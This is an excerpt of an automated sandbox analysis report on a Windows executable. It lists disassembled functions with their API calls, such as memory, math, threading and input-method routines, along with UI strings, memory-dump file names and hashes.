Instruction Fuzzy Hash: B861BC72B05781DAEB10CF69E4513AD33A1FB48B98F408A39EA6D47BA9CF38D115C740

Function 00007FF68B4BA3E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF68B4BA4CA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BA505

Strings

Press Key, xrefs: 00007FF68B4BA46F
Select Key, xrefs: 00007FF68B4BA43A

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: CreateThread_invalid_parameter_noinfo_noreturn
String ID: Press Key$Select Key
API String ID: 2430190256-2074042277
Opcode ID: 5b209fc4513323ca8da6c0f9494d1306fae5cf43531030bf689f9ac43c021c36
Instruction ID: 8d9b4aad09c346ba9cbc0f4d6c98882259d7c0abfae0393d499d81506f8ba471
Opcode Fuzzy Hash: 5b209fc4513323ca8da6c0f9494d1306fae5cf43531030bf689f9ac43c021c36
Instruction Fuzzy Hash: 7A31B562A18682C1FB508B54E49237E6711FF89BA4F505239EA9E47AFDDFBCD484C700

Function 00007FF68B492E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00007FF68B492E49
ImmSetCompositionWindow.IMM32 ref: 00007FF68B492E6F
ImmReleaseContext.IMM32 ref: 00007FF68B492E7B

Strings

, xrefs: 00007FF68B492E67

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: Context$CompositionReleaseWindow
String ID:
API String ID: 244372355-3916222277
Opcode ID: 14749f2e68473d5d6ca4be5c72f8be5447fe3472af0755b27ec1b9a61fe36adf
Instruction ID: b5cf31114730cbb24cac08f6c558dea38bd773a5c8e8b535173d9896160315ba
Opcode Fuzzy Hash: 14749f2e68473d5d6ca4be5c72f8be5447fe3472af0755b27ec1b9a61fe36adf
Instruction Fuzzy Hash: 2C012135A09B41C6EA608F16A555269B7A1FF8CFD4F084139DE8D87769EF3CE444CB40

Function 00007FF68B4CD234 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00007FF68B4CD269
__current_exception_context.VCRUNTIME140 ref: 00007FF68B4CD27D
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4CD285

Strings

csm, xrefs: 00007FF68B4CD255

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
Instruction ID: 3d11a5af49f6b9bd4ed8f61e1e0ea9d08c3fac9cde0302dd0656c9efb2406db8
Opcode Fuzzy Hash: 8a473f447337ef945c40d2bb0789044ac61d4c89af2c61f0201678ab2b843443
Instruction Fuzzy Hash: D2F0E237609B48CAC7259F61E8920AC3764FB4CB98B4A5135FA4D87B69CF38D899C700

Function 00007FF68B48B87E Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 474COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF68B48C12E
#CLOSE, xrefs: 00007FF68B48BCFC
#COLLAPSE, xrefs: 00007FF68B48BC95

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: freemallocmemcpy
String ID: %.*s$#CLOSE$#COLLAPSE
API String ID: 3056473165-830562872
Opcode ID: 93b02e3d0b5e85f3b6f415d32533d60ca59e2b990f45402d253789a5d223e26a
Instruction ID: 0008faeebf244eba287d143d4dd0dfbfbce514a705ea8cec87c2885346245010
Opcode Fuzzy Hash: 93b02e3d0b5e85f3b6f415d32533d60ca59e2b990f45402d253789a5d223e26a
Instruction Fuzzy Hash: 6632D332A04A85DBE719CB36C5412E8B7A0FF5D744F088739DB29976A9DF38B464CB40

Function 00007FF68B492210 Relevance: 6.3, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B492292
memcpy.VCRUNTIME140 ref: 00007FF68B4922B5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4922D8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B49235C
memcpy.VCRUNTIME140 ref: 00007FF68B49236C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: mallocmemcpy$free
String ID:
API String ID: 798594229-0
Opcode ID: 81a325c45dea29d3feae1001b346cf31d810afd4fe8ad6b8985023bc76e978e9
Instruction ID: b3f25bbf0f3f76d1c1169077ea58ace9359756d5c62ae35e4dacafbc3bf9de99
Opcode Fuzzy Hash: 81a325c45dea29d3feae1001b346cf31d810afd4fe8ad6b8985023bc76e978e9
Instruction Fuzzy Hash: E4418D32609B82C6EB508F65A5411ACB3A1FF88B94F18523ADE5DC77A9DF38E485C710

Function 00007FF68B4ADEF0 Relevance: 6.3, APIs: 4, Instructions: 345COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE066
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE084
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE3AB
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AE40D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: a344dcbf9793c9cf5e304d0889a832391ed2d92f708022cb1225239f5b48ac29
Instruction ID: 508b29d6fa2f89b0a20ab74b00a5fcdf6040c4ba31102ce0c067d5da5e107be7
Opcode Fuzzy Hash: a344dcbf9793c9cf5e304d0889a832391ed2d92f708022cb1225239f5b48ac29
Instruction Fuzzy Hash: 0AE1D532D08689C5E2139A3750431BDB390BF6E784F19A736ED68B72B6DF697581CB00

Function 00007FF68B4AF7B0 Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AF936
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AF953
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AFBC0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AFC0E

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: c3a05892b9fbfce1c0fae80fa352f2484f5b61a7fe1e395c90acc4d0a6b37165
Instruction ID: 0e31fe07da3db56c2e9b465c2e5a668f1c95927b360096bbdeff538f21e7eef1
Opcode Fuzzy Hash: c3a05892b9fbfce1c0fae80fa352f2484f5b61a7fe1e395c90acc4d0a6b37165
Instruction Fuzzy Hash: 58E19822D08A8DC6E253963750431F9A250FF7E385F19AB36ED58B75B5DF297181CB00

Function 00007FF68B4AFD90 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AFF29
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4AFF40
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B018B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4B01E4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 3629add72ceeceeb697877346239c254e8a5229519e0fab404850746d4966d57
Instruction ID: a92b9832c3518f0c2427446f260de9161bcf8e8b00141c0cca1fa06f5fa790b7
Opcode Fuzzy Hash: 3629add72ceeceeb697877346239c254e8a5229519e0fab404850746d4966d57
Instruction Fuzzy Hash: B0E1C522D08AC985E263967650432BAB350BF6E3C5F189736FE48B72B7DF297585C700

Function 00007FF68B4847C0 Relevance: 6.3, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4847E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48480C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B484831
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B484856
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B48487B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 44b16c2df660a442b6c2ad2a99b6511d3dc5d833735ddbf11cda490c78777d3c
Instruction ID: 795f65f65f9d7626a1a992acc9caa6846112112de963683eec39286e6d8d0cf8
Opcode Fuzzy Hash: 44b16c2df660a442b6c2ad2a99b6511d3dc5d833735ddbf11cda490c78777d3c
Instruction Fuzzy Hash: 76112624A4A682C5FE698F91E85133422A0FF49F40F0D943DC90DD73BAEF2CA904C794

Function 00007FF68B4A6060 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF68B4A64A0

Strings

%.*s, xrefs: 00007FF68B4A64CC
--------------------------------, xrefs: 00007FF68B4A640E
%*s%.*s, xrefs: 00007FF68B4A64F1

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memchr
String ID: %*s%.*s$ %.*s$--------------------------------
API String ID: 3297308162-2326682469
Opcode ID: 07c145e9c74eff4cc9826f19840dde911c580183a0ea3b7411d96eda4c53ca7e
Instruction ID: b00e8bf756d316b744b6b51c0ded859cf2e09953f1a6f32bae2a9e00bad68353
Opcode Fuzzy Hash: 07c145e9c74eff4cc9826f19840dde911c580183a0ea3b7411d96eda4c53ca7e
Instruction Fuzzy Hash: D3E1B032E04A85C5E751CB35D0467F873A4FF69788F09933ADA58B72A9EF78A085C700

Function 00007FF68B4B72C0 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

__std_exception_destroy.VCRUNTIME140 ref: 00007FF68B4B73D1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B73FD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B752B
__std_exception_copy.VCRUNTIME140 ref: 00007FF68B4B756D

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 668f00d90cb3f41bded2cea3d6defd2cb9b7c570fb216ce5133a26483c3839af
Instruction ID: f1a8b5113a6e588e2c9eb619aa1fc2cdef27bd6de8dac2c056498fba78ffc432
Opcode Fuzzy Hash: 668f00d90cb3f41bded2cea3d6defd2cb9b7c570fb216ce5133a26483c3839af
Instruction Fuzzy Hash: AF815972A05A81D1EB049F29E49536D3366FF48F88FA0903ADB4D47A6DEF78D895C340

Function 00007FF68B4981F0 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B49834C
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B498379
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4983A0
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF68B4983C3

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ceilffloorf
String ID:
API String ID: 300201839-0
Opcode ID: 4f46f875f46fa92d8de6cfc2ddb4c190dd6f8b07dfb4b1f5623ba0800429d927
Instruction ID: fda5bdb370f227fd957712296335d21e70088a283eca95e086547892211b9184
Opcode Fuzzy Hash: 4f46f875f46fa92d8de6cfc2ddb4c190dd6f8b07dfb4b1f5623ba0800429d927
Instruction Fuzzy Hash: 0F51BC3291CBD185D3628F3691422B9B7A0BF6D381F158336EA8867666EF3DD491CB00

Function 00007FF68B4C93D0 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C94D3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C9526
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C9530
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C957C

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: d133dc5d97f13755ec6f0bf77e7e0991687a12e1d00cb0fdcd74b073fba185a3
Instruction ID: 95fb2a7c3bdb6fb9761b3f29ed0a94142a8b2d93f48595122214ab6cd7bb03f5
Opcode Fuzzy Hash: d133dc5d97f13755ec6f0bf77e7e0991687a12e1d00cb0fdcd74b073fba185a3
Instruction Fuzzy Hash: 1C41FF62B08A51E1ED05DB16E12917D6291BF48FE4F944339DA6D83BE9EE3CE449C304

Function 00007FF68B4C9D60 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9E61
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9E74
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF68B4B29C8), ref: 00007FF68B4C9EE7
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C9EF4

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 41e4098f6903ffb1c59d0cd2e0f37de097f7a6c99d53bd332743e1f6a4a54820
Instruction ID: fc3e6c75f259a9f55ed9713956ab1bb9114430269bb7c603717cc88b9ab3627f
Opcode Fuzzy Hash: 41e4098f6903ffb1c59d0cd2e0f37de097f7a6c99d53bd332743e1f6a4a54820
Instruction Fuzzy Hash: 2B41CE62714A86E1EA14CB25D4652A96360FF48FE0F548639DB6D83BE9DF3CE099C300

Function 00007FF68B4C7EF0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20
memcpy.VCRUNTIME140 ref: 00007FF68B4C7FE2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C8035
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C8042

Part of subcall function 00007FF68B4CAF74: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF68B4C9945,?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4CAF8E

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 1155477157-0
Opcode ID: 047dd170d9da74deae2a54082c9d36e321ba8e479bfb212ec63d5f305555a14f
Instruction ID: 4496366ddb1785f664f300ce7b64638cf0e592ce2a6d8fa0e767f35ecc59984f
Opcode Fuzzy Hash: 047dd170d9da74deae2a54082c9d36e321ba8e479bfb212ec63d5f305555a14f
Instruction Fuzzy Hash: AB312762B09682C5FE149B16A5623792741BF08FE4F544239DE2D877EEDE3CE489C340

Function 00007FF68B4C9590 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF68B4B71FA), ref: 00007FF68B4C9672
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000004,?,00007FF68B4B71FA), ref: 00007FF68B4C96B0
memcpy.VCRUNTIME140 ref: 00007FF68B4C96BA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C96EF

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
